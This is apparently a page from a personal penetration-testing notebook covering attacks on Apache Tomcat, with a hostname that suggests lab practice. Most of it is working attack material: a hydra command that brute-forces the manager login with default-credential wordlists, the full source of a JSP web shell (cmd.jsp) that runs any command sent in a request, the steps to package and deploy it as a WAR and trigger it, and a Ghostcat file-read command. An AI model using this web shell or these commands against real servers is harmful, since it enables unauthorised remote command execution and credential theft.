๐Ÿ“–
sheepwall
  • Overview
  • Cloud Hacking
    • Azure
  • Hacking
    • Recon
      • Nmap
      • Website Recon
      • Service Enumeration
    • Exploitation
      • GraphQL
      • Application Attacks
      • Web Server Attacks
      • JSON attacks
      • CMS attacks
      • SQL Injection
      • Cross Site Scripting
      • Command Injection
      • SSRF
      • SSTI
      • Server Includes
      • XXE
      • WSDL/SOAP
      • Serialization Attacks
      • Cryptography
      • JWT
    • Installation
      • File Uploads
      • File Transfers
    • Actions on Objectives
      • Networking
      • Linux
    • Tools
    • Windows
      • 1. Getting Foothold
      • 2. Windows Exploitation
      • 3. Enumerating Active Directory
      • 4. Dumping Credentials
      • 5. Lateral Movement
      • 6. Persistence
      • 7. Active Directory
      • 8. LAPS
  • Bug Bounties
    • SSRF to Envoy Admin Page
    • Leaky Error Messages
    • HTTP verb tampering results in administrator role to the application
  • APT Information
    • DFIR Summary
Powered by GitBook
On this page
  • Tomcat
  • Service Discovery
  • Bruteforcing
  • WAR backdoor upload
  • Ghostcat
  1. Hacking
  2. Exploitation

Web Server Attacks

Attacks on various servers like Apache, Nginx and Tomcat

Tomcat

Service Discovery

$ curl -s http://target/docs/ | grep Tomcat

Generic structure of a Tomcat installation

โ”œโ”€โ”€ bin
โ”œโ”€โ”€ conf
โ”‚   โ”œโ”€โ”€ catalina.policy
โ”‚   โ”œโ”€โ”€ catalina.properties
โ”‚   โ”œโ”€โ”€ context.xml
โ”‚   โ”œโ”€โ”€ tomcat-users.xml <-- user credentials and roles
โ”‚   โ”œโ”€โ”€ tomcat-users.xsd
โ”‚   โ””โ”€โ”€ web.xml
โ”œโ”€โ”€ lib
โ”œโ”€โ”€ logs
โ”œโ”€โ”€ temp
โ”œโ”€โ”€ webapps
โ”‚   โ”œโ”€โ”€ manager
โ”‚   โ”‚   โ”œโ”€โ”€ images
โ”‚   โ”‚   โ”œโ”€โ”€ META-INF
โ”‚   โ”‚   โ””โ”€โ”€ WEB-INF
|   |       โ””โ”€โ”€ web.xml  <-- describes routes and classes
โ”‚   โ””โ”€โ”€ ROOT
โ”‚       โ””โ”€โ”€ WEB-INF
โ””โ”€โ”€ work
    โ””โ”€โ”€ Catalina
        โ””โ”€โ”€ localhost

Important pages are /manger and /host-manager with default weak passwords like tomcat:tomcat or admin:admin

Bruteforcing

$ hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt -f site http-get manager/html

WAR backdoor upload

After logging into the manager console, upload backdoor cmd.jsp

<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr); 
                disr = dis.readLine(); 
                }
        }
%>
</pre>
</BODY></HTML>

Upload the file

$ zip -r mybackdoor.war cmd.jsp

Browse -> Deploy the war file, and execute commands with 

$ curl http://target/mybackdoor/cmd.jsp?cmd=id

Ghostcat

LFI vulnerability that can only read files within the web apps folder, so it can't access /etc/passwd

$ python2.7 tomcat-ajp.lfi.py app-dev.inlanefreight.local -p 8009 -f WEB-INF/web.xml
PreviousApplication AttacksNextJSON attacks

Last updated 2 years ago

LogoGitHub - YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi: Tomcat-Ajpๅ่ฎฎๆ–‡ไปถ่ฏปๅ–ๆผๆดžGitHub